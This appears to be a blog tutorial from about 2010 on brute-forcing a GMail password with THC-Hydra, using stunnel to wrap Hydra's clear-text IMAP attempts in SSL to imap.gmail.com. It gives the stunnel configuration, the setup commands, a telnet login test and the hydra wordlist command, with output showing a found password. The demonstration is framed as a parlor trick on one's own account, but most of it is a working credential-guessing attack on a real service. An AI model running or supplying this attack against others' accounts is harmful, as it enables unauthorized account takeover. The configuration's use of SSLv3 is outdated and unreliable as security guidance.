Users are still known to use simple passwords. If you need to help convince someone of the importance of strong passwords, you can use a brute force tool to demonstrate what a good password list can do.

The first brute-force tool I ever picked up was THC-Hydra which supports all kinds of protocols like HTTP, HTTPS, VNC and IMAP to name a few. GMail is very popular in my circle of friends. Brute forcing a GMail account tends to be a very impressive parlor trick. The only issue is that GMail actually uses SSL IMAP and Hydra only supports clear-text IMAP. The solution: stunnel. Stunnel will encrypt your TCP connection inside SSL. Stunnel takes care of the encryption and Hydra takes care of the IMAP login attempts.

Read on to see a step by step how-to on setting this up on Ubuntu LUcid Lynx 10.04.First, you need to compile THC-Hydra. Follow the instructions here.

Installing STUNNEL is a bit simpler.

sudo apt-get install stunnel

Edit /etc/default/stunnel4, change ENABLED=0 to ENABLED=1.

Edit the /etc/stunnel/stunnel.conf and set it up for client mode. The configuration for IMAP will accept connections on the standard IMAP TCP port “143″ and redirect the traffic to imap.gmail.com on the standard SSL IMAP port “993″.

Below is the stunnel.conf file I use.

; Sample stunnel configuration file by Michal Trojnara 2002-2009
; Some options used here may not be adequate for your particular configuration
; Please make sure you understand them (especially the effect of the chroot jail
)
 
; Certificate/key is needed in server mode and optional in client mode
;cert = /etc/ssl/certs/stunnel.pem
;key = /etc/ssl/certs/stunnel.pem
 
; Protocol version (all, SSLv2, SSLv3, TLSv1)
sslVersion = SSLv3
 
; Some security enhancements for UNIX systems - comment them out on Win32
chroot = /var/lib/stunnel4/
setuid = stunnel4
setgid = stunnel4
; PID is created inside the chroot jail
pid = /stunnel4.pid
 
; Some performance tunings
socket = l:TCP_NODELAY=1
socket = r:TCP_NODELAY=1
;compression = zlib
 
; Workaround for Eudora bug
;options = DONT_INSERT_EMPTY_FRAGMENTS
 
; Authentication stuff
;verify = 2
; Don't forget to c_rehash CApath
; CApath is located inside chroot jail
;CApath = /certs
; It's often easier to use CAfile
;CAfile = /etc/stunnel/certs.pem
; Don't forget to c_rehash CRLpath
; CRLpath is located inside chroot jail
;CRLpath = /crls
; Alternatively you can use CRLfile
;CRLfile = /etc/stunnel/crls.pem
 
; Some debugging stuff useful for troubleshooting
debug = 7
output = /var/log/stunnel4/stunnel.log
 
; Use it for client mode
client = yes
 
; Service-level configuration
 
;[pop3s]
;accept  = 995
;connect = 110
 
[imaps]
accept = 143
connect = imap.gmail.com:993
 
;[ssmtp]
;accept  = 465
;connect = 25
 
;[https]
;accept  = 443
;connect = 80
;TIMEOUTclose = 0
 
; vim:ft=dosini

Start up the stunnel daemon.

sudo /etc/init.d/stunnel4 start

You can verify that the IMAP port is listening on your local server.

netstat -an | grep -iw LISTEN

Look for the following line in the output:

tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN

Now, before you can brute-force your GMail account, you must enable IMAP. Log on to your GMail account and click on Settings > Forwarding and POP/IMAP. Locate the IMAP Access: section and select Enable IMAP. Click on the Save Changes button to complete this step.

Let’s pull out our 1970′s toolbox and use TELNET to test our STUNNEL configuration and our GMail access. We will telnet to localhost’s port 143. We should see the Gmail banner “* OK Gimap ready for requests from …”

telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK Gimap ready for requests from 5.5.5.5 c5if2789008nfi.67

Now that we are connected to the GMail IMAP server, we can test communication by using some IMAP commands like LOGIN. In the example below, change username@gmail.com to your GMail username, and change password to your actual password.

01 LOGIN username@gmail.com password
01 OK username@gmail.com authenticated (Success)

You are now successfully logged into your GMail account. Use the LOGOUT command to end the session.

02 LOGOUT
* BYE LOGOUT Requested
02 OK 73 good day (Success)
Connection closed by foreign host.

OK, now we know we have our set up ready to go. This is were we start using Hydra to brute-force its way into the GMail account.

To start you will need a text file with common passwords. This is known as a wordlist. You can google for lists or pick some up from here. For my demonstration, I have a small list that I normally use which you can grab here. For testing you can add your real password to the list.

Now you are ready to use Hydra. You can use the GUI version by running xhydra but I prefer the command line.

hydra -l username@gmail.com -P wordlist.txt -V localhost imap

The -V option will show the login and password combination for each attempt. Once it finds a match it will need to kill all the other attempts that it is running. At the end of your prompt you should see something like this:

[143][imap] host: 127.0.0.1   login: username@gmail.com   password: 12345678
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2010-08-24 14:12:59

Congratulations, you now have access to YOUR email. You can reward yourself by purchasing a t-shirt that publicizes your brand new conquest here.